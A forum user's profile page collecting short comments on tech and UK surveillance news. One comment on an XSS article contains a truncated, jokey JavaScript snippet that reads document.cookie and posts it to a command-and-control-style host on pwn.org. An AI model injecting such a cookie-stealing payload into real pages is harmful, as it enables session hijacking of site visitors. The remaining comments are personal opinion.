* Posts by RichMcc

13 publicly visible posts • joined 14 Nov 2012

Labour says it will vote against DUP's proposed TV Licence reforms


I'm torn between hating the Tories and hating the BBC. I would abolish both given the option.

The only thing on the BBC I would watch would be occasionally the bias news coverage for a laugh. But as a British person in Britain I have to pay a TV licence to watch that? Meanwhile I can watch RT news, free online 24/7 which is considerably less bias. I can even watch Sky news for free without needing a licence.

What makes the BBC (governments pet media outlet) so special? Now that Top gear has been ruined there's absolutely nothing worth watching on there anyway. So they can stick their fee in the same place as most of their tongues reside. Firmly in T Mays backside.

Shadow Brokers resurface, offer to sell fresh 'wine of month' club exploits


Re: Using google translate

Very similar language and style to GOBBLES Security releases :)

DNS lookups can reveal every web page you visit, says German boffin


I use this service: - https://dns.watch/index

No logging, no filtering etc...

I have suspected Google DNS to be a security/privacy risk for a long time, especially if coupled with your search history.

Also the Pi will cache, but still needs to perform lookups for sites you've not previously visited. Which would then default to your ISP or Google depending on your setup so its still bad.

Microsoft scores nearly $1bn non-compete contract with US military


I guess they need to find some new 0dayz since the NSA lost all their tools and everything got patched

Sealed with an XSS: Popular vulnerabilities probed


Re: XSS....

<script type="text/javascript">

function SlurpData() {

var d = document.cookie;

var params = JSON.stringify({ data: d });

var xmlHttp = new XMLHttpRequest();

xmlHttp.onreadystatechange = function () {

if (xmlHttp.readyState == 4 && xmlHttp.status == 200) {

alert("All Your Sessions Are Belongs to me!");



xmlHttp.open("post", "www.pwn.org/CandC.asmx/Slurp", true);

xmlHttp.setRequestHeader("content-type", "application/json; charset=utf-8");

xmlHttp.setRequestHeader("Content-length", params.length);

xmlHttp.setRequestHeader("Connection", "close");





UK Snoopers' Charter crashes through critics into the next level


Any criminals, hackers or terrorists will already know how to circumvent this guff. All this bill will do is waste billions of tax payers money catching minimal amounts of small fish if anyone at all and it will push the real “terrorists” into darker more secure places.

And MP’s should NOT be exempt from this! They should be just as accountable as the rest of us if they’re insisting on pushing this forward.

And good luck, I’m behind 7 proxies, VPN and Tor on public wifi on a burner laptop… the lengths I have to goto to look at pictures of lolcatz..

Microsoft has made SQL Server for Linux. Repeat, Microsoft has made SQL Server 2016 for Linux


Leave our linux alone!

On Linux, we don't like closed binaries.. its open source for a reason. Stop polluting the free and open ecosystem and stick to your spyware OS Redmond!

Investigatory Powers Bill lands in Parliament amid howls over breadth of spying powers


What if an ISP gets hacked.. say like TalkTalk. And a Royal, MP, MEP, Council member,police commissioner, lawyer, teachers, nurses, doctors, priest, bishops, data gets hacked? Or worse.. a celebrities data? Dun dun Duuuuh! Do they want to open Pandora's box?


You show me yours, I'll show you mine?

I say lead by example. Lets see the last 12 months browsing history of every MP, Lord and Royal and we'll follow suit! If there's anyone left!

Licence to snoop: Ipso facto, crypto embargo? Draft Investigatory Powers bill lands


Everyone has the right to respect for his private and family life, his home and his correspondence.

- Article 8 of the Human Rights Act

Can supermodel Heidi Klum save Windows 8? Not so fast


It doesn’t matter how many celebs you pay to endorse it.. windows 8 doesn’t work as a desktop OS, metro gets in the way, and doesn’t work as a tablet OS, and the surface is useless as a tablet and a laptop. Put it in the bin with ME and Vista, and try harder next time...

Apple granted patent for ebook page-turning


You should only be able to patent "new" and "original" ideas... this is clearly neither..

Subjects bestow Samsung Galaxy Note 10.1 on Queen


Queen or not she'll be waiting forever for updates just like the rest of us who bought samsung products..